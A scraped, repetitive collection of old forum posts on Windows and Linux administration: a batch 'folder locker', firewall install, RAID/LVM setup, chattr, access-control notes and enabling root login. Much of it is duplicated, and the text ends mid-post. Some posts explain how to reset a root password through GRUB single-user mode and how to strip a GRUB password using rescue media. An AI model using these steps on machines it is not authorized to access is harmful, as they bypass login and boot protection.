echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
* Now paste it in notepad.
* Change the "type your password here" with your password (Marked as bold in the above posted matter).
* Save it as batch file(with extension .bat).Any name will do.
* Now you see a batch file. Double click it to create a folder locker.
* A new folder named Locker would be formed at the same location.
* Now brings all the files you want to hide in the locker folder.
* Now double click the batch file to lock the folder namely Locker.
* If you want to unlock your files,double click the batch file again and you would be prompted for password.Enter the password and enjoy access to the folder.
just follow these steps....
1. first change the password in the batch file and save it.
2. then double click dat batch file. it will create a folder named "locker".
3. place the data in dat folder.
4. then again double click dat batch file. folder will be made hidden.
5. if u want to view dat data, double click batch file,it will prompt u for password,just enter passwod, folder will be shown.
Linux Firewall
Linux Firewall
Hi,
If you are on a Linux Server and want added Security, Installing a Firewall is very important.
CSF (Config Security Firewall) or APF (Advanced Policy Firewall) are long known and great firewalls for Linux. At the same time, they are easy to install and use.
Tutorial:
Code:
wget http://www.configserver.com/free/csf.tgz
tar zxf csf.tar.gz
sh /csf/install.sh
Once Installed, use the following Options:
Code:
csf -s // starts the firewall
csf -r // restarts the firewall
For Configuration options, open the Configuration File - /etc/csf/csf.conf
Hi,
If you are on a Linux Server and want added Security, Installing a Firewall is very important.
CSF (Config Security Firewall) or APF (Advanced Policy Firewall) are long known and great firewalls for Linux. At the same time, they are easy to install and use.
Tutorial:
Code:
wget http://www.configserver.com/free/csf.tgz
tar zxf csf.tar.gz
sh /csf/install.sh
Once Installed, use the following Options:
Code:
csf -s // starts the firewall
csf -r // restarts the firewall
For Configuration options, open the Configuration File - /etc/csf/csf.conf
Linux Hacking Password Cracking Steps...
Linux Hacking Password Cracking Steps...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Step 1: Start the machine, press the down arrow key...
Step 2: You will find the grub loader screen in front of you... press 'e' and you see three lines press down arrow key to go to the second line and then again press 'e'
Step 3: Dont change anything press 'spacebar' and type '1', press enter and press 'B' to boot
Start 4: You'll see the bash shell , type 'passwd root' to change the password of the root
Start 5: after that type 'exit'
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
How to Set the grub loader password
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
You can secure this by applying the grub loader password at the time of installation or 'after installation' by following the following steps...
Step 1: Type grub-md5-crypt and enter the password that you want to set.
Step 2: Now copy the generated hash and password --md5
Step 3: Now open the grub.conf file by this command --> vim /boot/grub/grub.conf
and just after the timeout line paste the above line
Step 4: save and exit
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
How to remove the grub loader password
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Step 1: Insert the operating system disc, i am assuming that you are performing these steps on centos
Step 2: and type 'linux rescue'
Step 3: and as soon as ananconda gets started eject the disc and you will see a bash shell
Step 4: Type 'chroot /mnt/sysimage'
Step 5: Open the grub.conf by this command --> vim /boot/grub/grub.conf
Step 6: remove the password line from it. save and exit. exit from the shell and exit from the system. it will automatically reboots and next time it wont ask you for the grub loader password.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Step 1: Start the machine, press the down arrow key...
Step 2: You will find the grub loader screen in front of you... press 'e' and you see three lines press down arrow key to go to the second line and then again press 'e'
Step 3: Dont change anything press 'spacebar' and type '1', press enter and press 'B' to boot
Start 4: You'll see the bash shell , type 'passwd root' to change the password of the root
Start 5: after that type 'exit'
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
How to Set the grub loader password
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
You can secure this by applying the grub loader password at the time of installation or 'after installation' by following the following steps...
Step 1: Type grub-md5-crypt and enter the password that you want to set.
Step 2: Now copy the generated hash and password --md5
Step 3: Now open the grub.conf file by this command --> vim /boot/grub/grub.conf
and just after the timeout line paste the above line
Step 4: save and exit
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
How to remove the grub loader password
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Step 1: Insert the operating system disc, i am assuming that you are performing these steps on centos
Step 2: and type 'linux rescue'
Step 3: and as soon as ananconda gets started eject the disc and you will see a bash shell
Step 4: Type 'chroot /mnt/sysimage'
Step 5: Open the grub.conf by this command --> vim /boot/grub/grub.conf
Step 6: remove the password line from it. save and exit. exit from the shell and exit from the system. it will automatically reboots and next time it wont ask you for the grub loader password.
get free linux cd to your home
get free linux cd to your home
visit the following website and get the linux cd delievered to your home for free :
https://shipit.ubuntu.com/
visit the following website and get the linux cd delievered to your home for free :
https://shipit.ubuntu.com/
Managing RAID and LVM with Linux (v0.5)
Managing RAID and LVM with Linux (v0.5)
I hope to turn this into a general easy to follow guide to setting up RAID-5 and LVM on a modern Linux system. However, for now it's basically a collection of my notes as I experimented on my own systems. Please note that my own experimentation was based on the RAID and LVM implementations under Fedora Core 3 & 4, as wel as Red Hat Enterprise Linux 4, all of which are based on the 2.6 series of kernels. These instructions may or may not work with other versions or distros. I'm not an expert (yet) in either Software RAID or LVM so please use the comment section below for corrections and comments. Recent changes are highlighted in yellow.
* What is RAID and LVM
* Initial setup of a RAID-5 array
* Initial setup of LVM on top of RAID
* Handling a Drive Failure
* Common Glitches
* Other Useful Resources
* Expanding an Array/Filesytem
What is RAID and LVM
RAID is usually defined as Redundant Array of Inexpensive disks. It is normally used to spread data among several physical hard drives with enough redundancy that should any drive fail the data will still be intact. Once created a RAID array appears to be one device which can be used pretty much like a regular partition. There are several kinds of RAID but I will only refer to the two most common here.
The first is RAID-1 which is also known as mirroring. With RAID-1 it's basically done with two essentially identical drives, each with a complete set of data. The second, the one I will mostly refer to in this guide is RAID-5 which is set up using three or more drives with the data spread in a way that any one drive failing will not result in data loss. The Red Hat website has a great overview of the RAID Levels.
There is one limitation with Linux Software RAID that a /boot partition can only reside on a RAID-1 array.
Linux supports both several hardware RAID devices but also software RAID which allows you to use any IDE or SCSI drives as the physical devices. In all cases I'll refer to software RAID.
LVM stands for Logical Volume Manager and is a way of grouping drives and/or partition in a way where instead of dealing with hard and fast physical partitions the data is managed in a virtual basis where the virtual partitions can be resized. The Red Hat website has a great overview of the Logical Volume Manager.
There is one limitation that a LVM cannot be used for the /boot.
Initial set of a RAID-5 array
I recommend you experiment with setting up and managing RAID and LVM systems before using it on an important filesystem. One way I was able to do it was to take old hard drive and create a bunch of partitions on it (8 or so should be enough) and try combining them into RAID arrays. In my testing I created two RAID-5 arrays each with 3 partitions. You can then manually fail and hot remove the partitions from the array and then add them back to see how the recovery process works. You'll get a warning about the partitions sharing a physical disc but you can ignore that since it's only for experimentation.
In my case I have two systems with RAID arrays, one with two 73G SCSI drives running RAID-1 (mirroring) and my other test system is configured with three 120G IDE drives running RAID-5. In most cases I will refer to my RAID-5 configuration as that will be more typical.
I have an extra IDE controller in my system to allow me to support the use of more than 4 IDE devices which caused a very odd drive assignment. The order doesn't seem to bother the Linux kernel so it doesn't bother me. My basic configuration is as follows:
hda 120G drive
hdb 120G drive
hde 60G boot drive not on RAID array
hdf 120G drive
hdg CD-ROM drive
The first step is to create the physical partitions on each drive that will be part of the RAID array. In my case I want to use each 120G drive in the array in it's entirety. All the drives are partitioned identically so for example, this is how hda is partitioned:
Disk /dev/hda: 120.0 GB, 120034123776 bytes
16 heads, 63 sectors/track, 232581 cylinders
Units = cylinders of 1008 * 512 = 516096 bytes
Device Boot Start End Blocks Id System
/dev/hda1 * 1 232581 117220792+ fd Linux raid autodetect
So now with all three drives with a partitioned with id fd Linux raid autodetect you can go ahead and combine the partitions into a RAID array:
# /sbin/mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 \
/dev/hdb1 /dev/hda1 /dev/hdf1
Wow, that was easy. That created a special device /dev/md0 which can be used instead of a physical partition. You can check on the status of that RAID array with the mdadm command:
# /sbin/mdadm --detail /dev/md0
Version : 00.90.01
Creation Time : Wed May 11 20:00:18 2005
Raid Level : raid5
Array Size : 234436352 (223.58 GiB 240.06 GB)
Device Size : 117218176 (111.79 GiB 120.03 GB)
Raid Devices : 3
Total Devices : 3
Preferred Minor : 0
Persistence : Superblock is persistent
Update Time : Fri Jun 10 04:13:11 2005
State : clean
Active Devices : 3
Working Devices : 3
Failed Devices : 0
Spare Devices : 0
Layout : left-symmetric
Chunk Size : 64K
UUID : 36161bdd:a9018a79:60e0757a:e27bb7ca
Events : 0.10670
Number Major Minor RaidDevice State
0 3 1 0 active sync /dev/hda1
1 3 65 1 active sync /dev/hdb1
2 33 65 2 active sync /dev/hdf1
The important lines to see are the State line which should say clean otherwise there might be a problem. At the bottom you should make sure that the State column always says active sync which says each device is actively in the array. You could potentially have a spare device that's on-hand should any drive should fail. If you have a spare you'll see it listed as such here.
One thing you'll see above if you're paying attention is the fact that the size of the array is 240G but I have three 120G drives as part of the array. That's because the extra space is used as extra parity data that is needed to survive the failure of one of the drives.
Initial set of LVM on top of RAID
Now that we have /dev/md0 device you can create a Logical Volume on top of it. Why would you want to do that? If I were to build an ext3 filesystem on top of the RAID device and someday wanted to increase it's capacity I wouldn't be able to do that without backing up the data, building a new RAID array and restoring my data. Using LVM allows me to expand (or contract) the size of the filesystem without disturbing the existing data.
Anyway, here are the steps to then add this RAID array to the LVM system. The first command pvcreate will "initialize a disk or partition for use by LVM". The second command vgcreate will then create the Volume Group, in my case I called it lvm-raid:
# pvcreate /dev/md0
# vgcreate lvm-raid /dev/md0
The default value for the physical extent size can be too low for a large RAID array. In those cases you'll need to specify the -s option with a larger than default physical extent size. The default is only 4MB as of the version in Fedora Core 5. The maximum number of physical extents is approximately 65k so take your maximum volume size and divide it by 65k then round it to the next nice round number. For example, to successfully create a 550G RAID let's figure that's approximately 550,000 megabytes and divide by 65,000 which gives you roughly 8.46. Round it up to the next nice round number and use 16M (for 16 megabytes) as the physical extent size and you'll be fine:
# vgcreate -s 16M
Ok, you've created a blank receptacle but now you have to tell how many Physical Extents from the physical device (/dev/md0 in this case) will be allocated to this Volume Group. In my case I wanted all the data from /dev/md0 to be allocated to this Volume Group. If later I wanted to add additional space I would create a new RAID array and add that physical device to this Volume Group.
To find out how many PEs are available to me use the vgdisplay command to find out how many are available and now I can create a Logical Volume using all (or some) of the space in the Volume Group. In my case I call the Logical Volume lvm0.
# vgdisplay lvm-raid
.
.
Free PE / Size 57235 / 223.57 GB
# lvcreate -l 57235 lvm-raid -n lvm0
In the end you will have a device you can use very much like a plain 'ol partition called /dev/lvm-raid/lvm0. You can now check on the status of the Logical Volume with the lvdisplay command. The device can then be used to to create a filesystem on.
# lvdisplay /dev/lvm-raid/lvm0
--- Logical volume ---
LV Name /dev/lvm-raid/lvm0
VG Name lvm-raid
LV UUID FFX673-dGlX-tsEL-6UXl-1hLs-6b3Y-rkO9O2
LV Write Access read/write
LV Status available
# open 1
LV Size 223.57 GB
Current LE 57235
Segments 1
Allocation inherit
Read ahead sectors 0
Block device 253:2
# mkfs.ext3 /dev/lvm-raid/lvm0
.
.
# mount /dev/lvm-raid/lvm0 /mnt
# df -h /mnt
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/lvm--raid-lvm0
224G 93M 224G 1% /mnt
Handling a Drive Failure
As everything eventually does break (some sooner than others) a drive in the array will fail. It is a very good idea to run smartd on all drives in your array (and probably ALL drives period) to be notified of a failure or a pending failure as soon as possible. You can also manually fail a partition, meaning to take it out of the RAID array, with the following command:
# /sbin/mdadm /dev/md0 -f /dev/hdb1
mdadm: set /dev/hdb1 faulty in /dev/md0
Once the system has determined a drive has failed or is otherwise missing (you can shut down and pull out a drive and reboot to similate a drive failure or use the command to manually fail a drive above it will show something like this in mdadm:
# /sbin/mdadm --detail /dev/md0
Update Time : Wed Jun 15 11:30:59 2005
State : clean, degraded
Active Devices : 2
Working Devices : 2
Failed Devices : 1
Spare Devices : 0
.
.
Number Major Minor RaidDevice State
0 3 1 0 active sync /dev/hda1
1 0 0 - removed
2 33 65 2 active sync /dev/hdf1
You'll notice in this case I had /dev/hdb fail. I replaced it with a new drive with the same capacity and was able to add it back to the array. The first step is to partition the new drive just like when first creating the array. Then you can simply add the partition back to the array and watch the status as the data is rebuilt onto the newly replace drive.
# /sbin/mdadm /dev/md0 -a /dev/hdb1
# /sbin/mdadm --detail /dev/md0
Update Time : Wed Jun 15 12:11:23 2005
State : clean, degraded, recovering
Active Devices : 2
Working Devices : 3
Failed Devices : 0
Spare Devices : 1
Layout : left-symmetric
Chunk Size : 64K
Rebuild Status : 2% complete
.
.
During the rebuild process the system performance may be somewhat impacted but the data should remain in-tact.
Expanding an Array/Filesytem
I'm told it's now possible to expand the size of a RAID array much as you could on a commercial array such as the NetApp. The link below describes the procedure. I have yet to try it but it looks promising:
Growing a RAID5 array - http://scotgate.org/?p=107
I hope to turn this into a general easy to follow guide to setting up RAID-5 and LVM on a modern Linux system. However, for now it's basically a collection of my notes as I experimented on my own systems. Please note that my own experimentation was based on the RAID and LVM implementations under Fedora Core 3 & 4, as wel as Red Hat Enterprise Linux 4, all of which are based on the 2.6 series of kernels. These instructions may or may not work with other versions or distros. I'm not an expert (yet) in either Software RAID or LVM so please use the comment section below for corrections and comments. Recent changes are highlighted in yellow.
* What is RAID and LVM
* Initial setup of a RAID-5 array
* Initial setup of LVM on top of RAID
* Handling a Drive Failure
* Common Glitches
* Other Useful Resources
* Expanding an Array/Filesytem
What is RAID and LVM
RAID is usually defined as Redundant Array of Inexpensive disks. It is normally used to spread data among several physical hard drives with enough redundancy that should any drive fail the data will still be intact. Once created a RAID array appears to be one device which can be used pretty much like a regular partition. There are several kinds of RAID but I will only refer to the two most common here.
The first is RAID-1 which is also known as mirroring. With RAID-1 it's basically done with two essentially identical drives, each with a complete set of data. The second, the one I will mostly refer to in this guide is RAID-5 which is set up using three or more drives with the data spread in a way that any one drive failing will not result in data loss. The Red Hat website has a great overview of the RAID Levels.
There is one limitation with Linux Software RAID that a /boot partition can only reside on a RAID-1 array.
Linux supports both several hardware RAID devices but also software RAID which allows you to use any IDE or SCSI drives as the physical devices. In all cases I'll refer to software RAID.
LVM stands for Logical Volume Manager and is a way of grouping drives and/or partition in a way where instead of dealing with hard and fast physical partitions the data is managed in a virtual basis where the virtual partitions can be resized. The Red Hat website has a great overview of the Logical Volume Manager.
There is one limitation that a LVM cannot be used for the /boot.
Initial set of a RAID-5 array
I recommend you experiment with setting up and managing RAID and LVM systems before using it on an important filesystem. One way I was able to do it was to take old hard drive and create a bunch of partitions on it (8 or so should be enough) and try combining them into RAID arrays. In my testing I created two RAID-5 arrays each with 3 partitions. You can then manually fail and hot remove the partitions from the array and then add them back to see how the recovery process works. You'll get a warning about the partitions sharing a physical disc but you can ignore that since it's only for experimentation.
In my case I have two systems with RAID arrays, one with two 73G SCSI drives running RAID-1 (mirroring) and my other test system is configured with three 120G IDE drives running RAID-5. In most cases I will refer to my RAID-5 configuration as that will be more typical.
I have an extra IDE controller in my system to allow me to support the use of more than 4 IDE devices which caused a very odd drive assignment. The order doesn't seem to bother the Linux kernel so it doesn't bother me. My basic configuration is as follows:
hda 120G drive
hdb 120G drive
hde 60G boot drive not on RAID array
hdf 120G drive
hdg CD-ROM drive
The first step is to create the physical partitions on each drive that will be part of the RAID array. In my case I want to use each 120G drive in the array in it's entirety. All the drives are partitioned identically so for example, this is how hda is partitioned:
Disk /dev/hda: 120.0 GB, 120034123776 bytes
16 heads, 63 sectors/track, 232581 cylinders
Units = cylinders of 1008 * 512 = 516096 bytes
Device Boot Start End Blocks Id System
/dev/hda1 * 1 232581 117220792+ fd Linux raid autodetect
So now with all three drives with a partitioned with id fd Linux raid autodetect you can go ahead and combine the partitions into a RAID array:
# /sbin/mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 \
/dev/hdb1 /dev/hda1 /dev/hdf1
Wow, that was easy. That created a special device /dev/md0 which can be used instead of a physical partition. You can check on the status of that RAID array with the mdadm command:
# /sbin/mdadm --detail /dev/md0
Version : 00.90.01
Creation Time : Wed May 11 20:00:18 2005
Raid Level : raid5
Array Size : 234436352 (223.58 GiB 240.06 GB)
Device Size : 117218176 (111.79 GiB 120.03 GB)
Raid Devices : 3
Total Devices : 3
Preferred Minor : 0
Persistence : Superblock is persistent
Update Time : Fri Jun 10 04:13:11 2005
State : clean
Active Devices : 3
Working Devices : 3
Failed Devices : 0
Spare Devices : 0
Layout : left-symmetric
Chunk Size : 64K
UUID : 36161bdd:a9018a79:60e0757a:e27bb7ca
Events : 0.10670
Number Major Minor RaidDevice State
0 3 1 0 active sync /dev/hda1
1 3 65 1 active sync /dev/hdb1
2 33 65 2 active sync /dev/hdf1
The important lines to see are the State line which should say clean otherwise there might be a problem. At the bottom you should make sure that the State column always says active sync which says each device is actively in the array. You could potentially have a spare device that's on-hand should any drive should fail. If you have a spare you'll see it listed as such here.
One thing you'll see above if you're paying attention is the fact that the size of the array is 240G but I have three 120G drives as part of the array. That's because the extra space is used as extra parity data that is needed to survive the failure of one of the drives.
Initial set of LVM on top of RAID
Now that we have /dev/md0 device you can create a Logical Volume on top of it. Why would you want to do that? If I were to build an ext3 filesystem on top of the RAID device and someday wanted to increase it's capacity I wouldn't be able to do that without backing up the data, building a new RAID array and restoring my data. Using LVM allows me to expand (or contract) the size of the filesystem without disturbing the existing data.
Anyway, here are the steps to then add this RAID array to the LVM system. The first command pvcreate will "initialize a disk or partition for use by LVM". The second command vgcreate will then create the Volume Group, in my case I called it lvm-raid:
# pvcreate /dev/md0
# vgcreate lvm-raid /dev/md0
The default value for the physical extent size can be too low for a large RAID array. In those cases you'll need to specify the -s option with a larger than default physical extent size. The default is only 4MB as of the version in Fedora Core 5. The maximum number of physical extents is approximately 65k so take your maximum volume size and divide it by 65k then round it to the next nice round number. For example, to successfully create a 550G RAID let's figure that's approximately 550,000 megabytes and divide by 65,000 which gives you roughly 8.46. Round it up to the next nice round number and use 16M (for 16 megabytes) as the physical extent size and you'll be fine:
# vgcreate -s 16M
Ok, you've created a blank receptacle but now you have to tell how many Physical Extents from the physical device (/dev/md0 in this case) will be allocated to this Volume Group. In my case I wanted all the data from /dev/md0 to be allocated to this Volume Group. If later I wanted to add additional space I would create a new RAID array and add that physical device to this Volume Group.
To find out how many PEs are available to me use the vgdisplay command to find out how many are available and now I can create a Logical Volume using all (or some) of the space in the Volume Group. In my case I call the Logical Volume lvm0.
# vgdisplay lvm-raid
.
.
Free PE / Size 57235 / 223.57 GB
# lvcreate -l 57235 lvm-raid -n lvm0
In the end you will have a device you can use very much like a plain 'ol partition called /dev/lvm-raid/lvm0. You can now check on the status of the Logical Volume with the lvdisplay command. The device can then be used to to create a filesystem on.
# lvdisplay /dev/lvm-raid/lvm0
--- Logical volume ---
LV Name /dev/lvm-raid/lvm0
VG Name lvm-raid
LV UUID FFX673-dGlX-tsEL-6UXl-1hLs-6b3Y-rkO9O2
LV Write Access read/write
LV Status available
# open 1
LV Size 223.57 GB
Current LE 57235
Segments 1
Allocation inherit
Read ahead sectors 0
Block device 253:2
# mkfs.ext3 /dev/lvm-raid/lvm0
.
.
# mount /dev/lvm-raid/lvm0 /mnt
# df -h /mnt
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/lvm--raid-lvm0
224G 93M 224G 1% /mnt
Handling a Drive Failure
As everything eventually does break (some sooner than others) a drive in the array will fail. It is a very good idea to run smartd on all drives in your array (and probably ALL drives period) to be notified of a failure or a pending failure as soon as possible. You can also manually fail a partition, meaning to take it out of the RAID array, with the following command:
# /sbin/mdadm /dev/md0 -f /dev/hdb1
mdadm: set /dev/hdb1 faulty in /dev/md0
Once the system has determined a drive has failed or is otherwise missing (you can shut down and pull out a drive and reboot to similate a drive failure or use the command to manually fail a drive above it will show something like this in mdadm:
# /sbin/mdadm --detail /dev/md0
Update Time : Wed Jun 15 11:30:59 2005
State : clean, degraded
Active Devices : 2
Working Devices : 2
Failed Devices : 1
Spare Devices : 0
.
.
Number Major Minor RaidDevice State
0 3 1 0 active sync /dev/hda1
1 0 0 - removed
2 33 65 2 active sync /dev/hdf1
You'll notice in this case I had /dev/hdb fail. I replaced it with a new drive with the same capacity and was able to add it back to the array. The first step is to partition the new drive just like when first creating the array. Then you can simply add the partition back to the array and watch the status as the data is rebuilt onto the newly replace drive.
# /sbin/mdadm /dev/md0 -a /dev/hdb1
# /sbin/mdadm --detail /dev/md0
Update Time : Wed Jun 15 12:11:23 2005
State : clean, degraded, recovering
Active Devices : 2
Working Devices : 3
Failed Devices : 0
Spare Devices : 1
Layout : left-symmetric
Chunk Size : 64K
Rebuild Status : 2% complete
.
.
During the rebuild process the system performance may be somewhat impacted but the data should remain in-tact.
Expanding an Array/Filesytem
I'm told it's now possible to expand the size of a RAID array much as you could on a commercial array such as the NetApp. The link below describes the procedure. I have yet to try it but it looks promising:
Growing a RAID5 array - http://scotgate.org/?p=107
Protecting IMPORTANT file in Linux
Protecting IMPORTANT file in Linux
Sometimes, by mistake you (as root) can delete some of the important files from your linux machine. It can be a ".conf" file for any important server or anyother file that is important for you.
As root user, you have all the rights to do whatever you wish to do on the system. It is indeed a good thing and a blessing but sometimes this EXTRA power can be dangerous. Imagine giving "
PHP Code:
rm -rf /etc/mail/
" -- this can delete all your mail server configuration files.
There is a small HACK (hack means intelligent program) to make your important files IMMUTABLE (even root cannot remove them accidently).
There is a command "chattr" that can be used to make your important files protected against accident removals.
The syntax is:
PHP Code:
chattr +i filename
i means - A file with the ‘i’ attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file and no data can be written to the file.
So your important files are protected against accident removal and data manipulation. Here I am showing one example:
Showing the importance of "chattr" command
1. I had created a file "impfile" under /tmp
2. Make it "immutable" using "chattr command" -- chattr +i impfile
3. Tried to delete the file (login as root user) -- FAILED
4. Tried to modify the contents of file (as root user) -- FAILED
5. Tried to create a link of the file (as root user) -- FAILED
Now that's a HACK!!!!
PS: whenever you wish to remove the file, for any reasons just give:
PHP Code:
chattr -i filename
and then delete it, as usual. As shown:
showing how to delete a file having chattr -i option set
Sometimes, by mistake you (as root) can delete some of the important files from your linux machine. It can be a ".conf" file for any important server or anyother file that is important for you.
As root user, you have all the rights to do whatever you wish to do on the system. It is indeed a good thing and a blessing but sometimes this EXTRA power can be dangerous. Imagine giving "
PHP Code:
rm -rf /etc/mail/
" -- this can delete all your mail server configuration files.
There is a small HACK (hack means intelligent program) to make your important files IMMUTABLE (even root cannot remove them accidently).
There is a command "chattr" that can be used to make your important files protected against accident removals.
The syntax is:
PHP Code:
chattr +i filename
i means - A file with the ‘i’ attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file and no data can be written to the file.
So your important files are protected against accident removal and data manipulation. Here I am showing one example:
Showing the importance of "chattr" command
1. I had created a file "impfile" under /tmp
2. Make it "immutable" using "chattr command" -- chattr +i impfile
3. Tried to delete the file (login as root user) -- FAILED
4. Tried to modify the contents of file (as root user) -- FAILED
5. Tried to create a link of the file (as root user) -- FAILED
Now that's a HACK!!!!
PS: whenever you wish to remove the file, for any reasons just give:
PHP Code:
chattr -i filename
and then delete it, as usual. As shown:
showing how to delete a file having chattr -i option set
OS HARDNING LINUX SECURITY
OS HARDNING LINUX SECURITY
LINUX SECURITY Read ppt also frnds.........
CISCO routers used in Enterprise Networks
UNIX/Linux based Networks used in:
Universities
Small-to-Medium sized companies
Lecture Covers the following topics:
Secure UNIX/Linux workstations & Servers
Limiting Resource
Kernel tunable parameters
Secure Linux Networks – IPTABLES
Firewalls
Auditing tools
RPM, Snort, Portsentry
Intrusion Detection – IDS/NIDS
OpenSSH
Performance Tuning of Linux Workstations & Servers
KERBEROS for authentication
Partitions, resize partitions, run levels
Booting into rescue mode
Planning for disasters, Backup
IDE hard drive tuning
Resource Monitoring & Speed up Networks
LINUX SECURITY Read ppt also frnds.........
CISCO routers used in Enterprise Networks
UNIX/Linux based Networks used in:
Universities
Small-to-Medium sized companies
Lecture Covers the following topics:
Secure UNIX/Linux workstations & Servers
Limiting Resource
Kernel tunable parameters
Secure Linux Networks – IPTABLES
Firewalls
Auditing tools
RPM, Snort, Portsentry
Intrusion Detection – IDS/NIDS
OpenSSH
Performance Tuning of Linux Workstations & Servers
KERBEROS for authentication
Partitions, resize partitions, run levels
Booting into rescue mode
Planning for disasters, Backup
IDE hard drive tuning
Resource Monitoring & Speed up Networks
ACCESS CONTROL FACTS FROM SECURITY POINT OF VIEW
* Access control is the ability to permit or deny the privileges that users have when accessing resources on a network or computer. Access control involves three entities:
=> Objects are the data, applications, systems, networks, and physical space.
=>Subjects are the users, applications, or processes that need access to objects.
=>The access control system includes the policies, procedures, and technologies that are implemented to control a subject's access to an object.
======================================================
* Access control includes the following processes:
=> Identification identifies the subject. Examples include a username or a user ID number.
=> Authentication is the process of validating a subject's identity. It includes the identification process, the user providing input to prove identity, and the system accepting that input as valid.
=> Authorization is the granting or denying a subject's access to an object based on the level of permissions or the actions allowed on the object.
=>Auditing (also referred to as accounting) is maintaining a record of a subject's activity within the information system.
Note: Authentication, authorization, and auditing are known as the AAA of access control.
======================================================
* An access control policy defines the steps and measures that are taken to control access to objects by subjects. Access controls can be classified according to the function they perform:
=> Preventive access controls deter intrusion or attacks, for example, separation of duties or dual-custody processes.
=> Detective access controls search for details about the attack or the attacker, for example, intrusion detection systems.
=> Corrective access controls implement short-term repairs to restore basic functionality following an attack.
=> Deterrent access controls discourage continued or escalations of attacks during an attack.
=> Recovery access controls restore the system to normal operations after the attack and short-term stabilization period.
=> Compensative access controls are alternatives to primary access controls.
======================================================
* Access control measures can also be classified based on how they restrict or control access:
=> Administrative controls are policies that describe accepted practices. Examples are directive policies and employee awareness training.
=> Technical controls are computer mechanisms that restrict access.
Examples are encryption, one-time passwords, access control lists, and firewall rules.
=> Physical controls restrict physical access. Examples are perimeter security, site location, networking cables, and employee segregation.
On a computer network, a directory service is an example of a technical access control system that you use to manage and enforce access control policies. Examples of directory services are:
=> Active Directory for Microsoft Windows networks.
=> Novell's eDirectory for NetWare, Linux, and Windows networks.
======================================================
* Within the directory service:
=> A user account is created for each subject.
Identification is performed during logon by supplying a valid user account name.
=> Authentication is performed during logon by supplying the password or other requirements for proving identity.
=> Authorization to use network resources, such as files, printers, or computers, is controlled by identifying permissions or rights.
=> Auditing is performed by the operating system as it tracks actions taken by subjects on objects.
=> Objects are the data, applications, systems, networks, and physical space.
=>Subjects are the users, applications, or processes that need access to objects.
=>The access control system includes the policies, procedures, and technologies that are implemented to control a subject's access to an object.
======================================================
* Access control includes the following processes:
=> Identification identifies the subject. Examples include a username or a user ID number.
=> Authentication is the process of validating a subject's identity. It includes the identification process, the user providing input to prove identity, and the system accepting that input as valid.
=> Authorization is the granting or denying a subject's access to an object based on the level of permissions or the actions allowed on the object.
=>Auditing (also referred to as accounting) is maintaining a record of a subject's activity within the information system.
Note: Authentication, authorization, and auditing are known as the AAA of access control.
======================================================
* An access control policy defines the steps and measures that are taken to control access to objects by subjects. Access controls can be classified according to the function they perform:
=> Preventive access controls deter intrusion or attacks, for example, separation of duties or dual-custody processes.
=> Detective access controls search for details about the attack or the attacker, for example, intrusion detection systems.
=> Corrective access controls implement short-term repairs to restore basic functionality following an attack.
=> Deterrent access controls discourage continued or escalations of attacks during an attack.
=> Recovery access controls restore the system to normal operations after the attack and short-term stabilization period.
=> Compensative access controls are alternatives to primary access controls.
======================================================
* Access control measures can also be classified based on how they restrict or control access:
=> Administrative controls are policies that describe accepted practices. Examples are directive policies and employee awareness training.
=> Technical controls are computer mechanisms that restrict access.
Examples are encryption, one-time passwords, access control lists, and firewall rules.
=> Physical controls restrict physical access. Examples are perimeter security, site location, networking cables, and employee segregation.
On a computer network, a directory service is an example of a technical access control system that you use to manage and enforce access control policies. Examples of directory services are:
=> Active Directory for Microsoft Windows networks.
=> Novell's eDirectory for NetWare, Linux, and Windows networks.
======================================================
* Within the directory service:
=> A user account is created for each subject.
Identification is performed during logon by supplying a valid user account name.
=> Authentication is performed during logon by supplying the password or other requirements for proving identity.
=> Authorization to use network resources, such as files, printers, or computers, is controlled by identifying permissions or rights.
=> Auditing is performed by the operating system as it tracks actions taken by subjects on objects.
Enable Root Account
Enable Root Account
To Enable Root account in KUbuntu / Ubuntu
1) Install any text editor
- sudo apt-get install nexteditorname (kwrite or gedit)
2) Write this command in terminal
sudo kwrite /etc/kde4/kdm/kdmrc
3) Search for Allow login to root
4) Change Value from false to true
5) Make a password for your root account
- sudo passwd root
6) Enter new password for root account and reboot your system to login as root.
To Enable Root account in Fedora / linux
1) Install any text editor (kwrite or gedit)
- su yum install nexteditorname
2) Write this command in terminal
- su -c vim /etc/pam.d/gdm ( One file open in text editor when you run this command and you have to make comment the below line by add # )
#auth required pm-suceed-if so !=root
- su -c vim /etc/pam.d/gdm-password ( One file open in text editor when you run this command and you have to make comment the below line by add # )
#auth required pm-suceed-if so !=root
3) Set password for root account and restart to login as root.
To Enable Root account in KUbuntu / Ubuntu
1) Install any text editor
- sudo apt-get install nexteditorname (kwrite or gedit)
2) Write this command in terminal
